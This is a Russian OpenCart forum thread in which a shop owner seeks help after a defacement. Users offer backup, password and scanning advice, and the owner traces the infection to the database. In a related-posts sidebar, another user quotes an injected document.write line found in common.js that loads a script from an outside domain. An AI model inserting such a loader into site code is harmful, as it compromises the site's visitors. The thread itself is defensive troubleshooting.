Перейти к содержанию

Рекомендуемые сообщения

Добрый день. Есть сайт https://okupi.net/ , с утра его взломали, висит фраза K4RNOS WAS HERE! HACKED! WWW.CYBER-DEMONS.COM, доступ к админке есть, сайт стоит на официально купленном шаблоне shop-store 2. Ничего на него не заливалось. Восстановление вплоть до копии 2-х месячной давности не дает результатов, все остается по прежнему. 

 

Может есть какие либо подсказки, буду очень признателен и спасибо

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
8 минут назад, vovaray сказал:

Может есть какие либо подсказки, буду очень признателен и спасибо

там сервер кеш не держит?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пароль был

"admin / admin" ?
Бутфорсом

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Самое простое. Попробуйте так, возможно поможет.

1. Забекапить все нынешние файлы и папки, базу данных.
2. Удалить файлы и очистить базу данных.

3. Восстановить из бекапа, который делали, когда все было хорошо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
3 минуты назад, markimax сказал:

Пароль был

"admin / admin" ?
Бутфорсом

10 символов с буквами и цифрами, меняю каждые 2 недели

 

6 минут назад, theRGD сказал:

там сервер кеш не держит?

честно не знаю, но вы имеете ввиду что я поднимаю бекап но зараженный кеш может быть?

 

2 минуты назад, ilm сказал:

Самое простое. Попробуйте так, возможно поможет.

1. Забекапить все нынешние файлы и папки, базу данных.
2. Удалить файлы и очистить базу данных.

3. Восстановить из бекапа, который делали, когда все было хорошо.

идея понятна, спасибо большое

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
23 минуты назад, vovaray сказал:

10 символов с буквами и цифрами, меняю каждые 2 недели

 

 

На одном аккаунте много сайтов ?
 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
5 минут назад, markimax сказал:

На одном аккаунте много сайтов ?
 

да, 5 штук, у всех пароли и логины конечно же не повторяются

 

 

на данный момнет нашел у себя Базу Данных на компе. Восстановил и работает, зараза не в фаилах сайта. а именно в БД сидела

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
33 минуты назад, vovaray сказал:

да, 5 штук, у всех пароли и логины конечно же не повторяются

 

 

на данный момнет нашел у себя Базу Данных на компе. Восстановил и работает, зараза не в фаилах сайта. а именно в БД сидела

Давно уже говорил, что ocmod  опенкарта - подарок для взломщика.

Мало того, что это безразмерная дырища - получил доступ к админке - считай, есть полный доступ ко всему сайту на уровне файлов. И не надо заморачиваться, обходные пути искать. (а, скажем, в ОС1.5 доступ к админке, при правильно настроенном хостинге, ничего особо-то и не дает)

Так это еще и эксклюзивная возможность прятать код в базе данных.

"Суслика видишь? Нет? - А он ЕСТЬ!"

Изменено пользователем Shureg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

повторно взломали уже с новой заставкой http://joxi.ru/KAxLzoNC4Y8wYA 

 

при чем в этот раз сменили пароль от админки. Подозреваю, что когда я заходил в админку в момнет когда сайт был взломан, тогда пароль и украили. Сейчас то я его сменил и сайт бекапнул, но по факту уязвимость на данный момент осталась

Изменено пользователем vovaray

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

С таким то статусом ......

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
39 минут назад, Tom сказал:

С таким то статусом ......

отличный комментарий к теме разговора, но что бы не было вопросов, то да ставил пиратские версии до 2 опенкарта. Или Вы может в жизни совершенно все покупали и никогда не пользовались пиратским? Но теперь покупаю все легально, так что буду рад сообщениями по теме

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Не нужно переживать за других пиратов... Комментарий больше , чем в тему. 5 сайтов на одном хостинге, заражён один, но здесь вся соль в том, что источник заразы может быть и не именно этот магазин. А дальше уже проблемы собственных предпочтений, что считать варезом и кого упрекать за то что он напоминает об этом, что варез  это как незащищённый секс, может и повезёт, а может и нет и тогда придётся ехать на курорт , где лечат грязями, что бы привыкнуть к земле... Как то так.

PS данный банер от турецко-иранских друзей я видел десятки раз и каждый раз его притащили с феофавано подобных ресурсов, считая что один раз это не так страшно.

  • +1 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
4 минуты назад, Tom сказал:

Не нужно переживать за других пиратов... Комментарий больше , чем в тему. 5 сайтов на одном хостинге, заражён один, но здесь вся соль в том, что источник заразы может быть и не именно этот магазин. А дальше уже проблемы собственных предпочтений, что считать варезом и кого упрекать за то что он напоминает об этом, что варез  это как незащищённый секс, может и повезёт, а может и нет и тогда придётся ехать на курорт , где лечат грязями, что бы привыкнуть к земле... Как то так.

PS данный банер от турецко-иранских друзей я видел десятки раз и каждый раз его притащили с феофавано подобных ресурсов, считая что один раз это не так страшно.

у меня нет ни на одном сайте ни одного нелегального шаблона или модуля. И да, для меня 1 раз страшно, потому что у меня все сайты стоят на одном шаблоне и если смогли взломать 1 сайт, значит могут и другие. Никого не упрекаю, имеете право писать, то что пожелаете - ваши слова, ваше право. Я и так благодарен каждому за помощь и буду рад любому комментарию, который поможет разрешить проблему.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Айболит в помощь. То что взлом был только через базу, мало похоже на правду. А вот то что зараза до сих пор в магазине, более реально.

И так Айболит 

https://revisium.com/ai/

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
6 минут назад, Tom сказал:

Айболит в помощь. То что взлом был только через базу, мало похоже на правду. А вот то что зараза до сих пор в магазине, более реально.

И так Айболит 

https://revisium.com/ai/

большое спасибо!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Похожий контент

    • От IIIBarsik
      Старый сайт:
      OcStore 1.5 
      Тема стандартная (defaut) 
       
      Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: 
      что то такое (картинка из инета)

      В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. 
      Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: 
      <?php foreach ($scripts as $script) { ?> <script type="text/javascript" src="<?php echo $script; ?>"></script> <?php } ?> Понимаю, что данная херота может инклудится вот сюда из любого файла
      Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js
      В конце файла была приписка:
      document.write('<script src="https://afrodizinlife.gq"><\x2fscript>'); Собственно вопрос:
      Как такие вещи вообще происходят на opencart?
      P.S. По поводу паролей можно не писать: 
      1. 10 значные с спецсимволами + регистры
      2. В браузере не храню
      3. В FileZilla тоже не храню
      Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? 
      Или какие то минимумы, что необходимо сделать всем и вся? 
    • От Kompanetsr
      Добрый день!
       
      Ребят, кто понимает, в чем может быть проблема?
      Вы не могли бы взглянуть на сайт, либо взлом, либо проблема с шаблоном... Перед этим всем в карточках товара вылазила ошибка 500
      Пробовали делать Бэк-ап, но на следующий день снова имеем то, что имеем (кривую главную страницу и всё)
      mnogo-mozaiki.ru
       
      Для удобства и быстроты связи можете писать в вотсап 89150803060 Роман
    • От mirek
      498.00 руб
      Скачать/Купить дополнение


      Двух факторная Google авторизация для админ панели
      Модуль позволяет обезопасить ваш интернет-магазин на базе OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту административной части магазина. Даже в том случае если злоумышленник получил логин и пароль от админ панели Вашего магазина  - он не сможет войти! Модуль активирует вход в админ панель магазина используя двух факторную Google авторизацию!

       
      Коды доступа меняются с интервалом в 30 секунд!
       
      Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство
      приложение Google Authenticator!  Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации
      на Вашем сайте

      Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве!

      Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени 
      между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете
      для получения кодов для прохождения двух факторной Google авторизации

      Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! 
       
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.
       Тип распространения:
      as is (как есть)  
      Установка:
      Для установки модуля users2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений
      загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в настройках пользователей админ панели появится пункт "Использовать 2fa google авторизацию" Добавил mirek Добавлено 02.04.2018 Категория Модули Системные требования Сайт разработчика http://hgroup.pp.ua Старая цена Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Не проверялось  
    • От mirek
      300.00 руб
      Скачать/Купить дополнение


      Двух факторная Google авторизация для покупателей
      Модуль позволяет обезопасить доступ к профилю покупателей на сайтах с CMS OcStore/OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту профиля покупателя магазина. Даже в том случае если злоумышленник получил логин и пароль от профиля покупателя магазина  - он не сможет войти! Модуль активирует вход в профиль покупателя магазина используя двух факторную Google авторизацию!

      Модуль интегрируется в стандартную тему OcStore/Opencart
       
      Коды доступа меняются с интервалом в 30 секунд!

      Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство
      приложение Google Authenticator!  Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации
      на Вашем сайте

      Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве!

      Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени 
      между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете
      для получения кодов для прохождения двух факторной Google авторизации

      Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! 
       
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.
       Тип распространения:
      as is (как есть)  
      Установка:
      Для установки модуля customers2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений
      загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в меню профиля покупателя появятся пункты "2fa google авторизация"   
      Добавил mirek Добавлено 07.04.2018 Категория Модули Системные требования Сайт разработчика http://hgroup.pp.ua/ Старая цена Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Не проверялось  
    • От ArtemPitov
      498.00 руб
      Скачать/Купить дополнение


      Защита от вирусов и хакеров
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
      Добавил ArtemPitov Добавлено 14.01.2018 Категория Модули Системные требования PHP 5.4 и выше Сайт разработчика https://pitov.pro Старая цена 1000 Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Opencart.pro 2.3
      Opencart.pro 2.1
      OcShop 2.0.3.х
      Не проверялось  
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.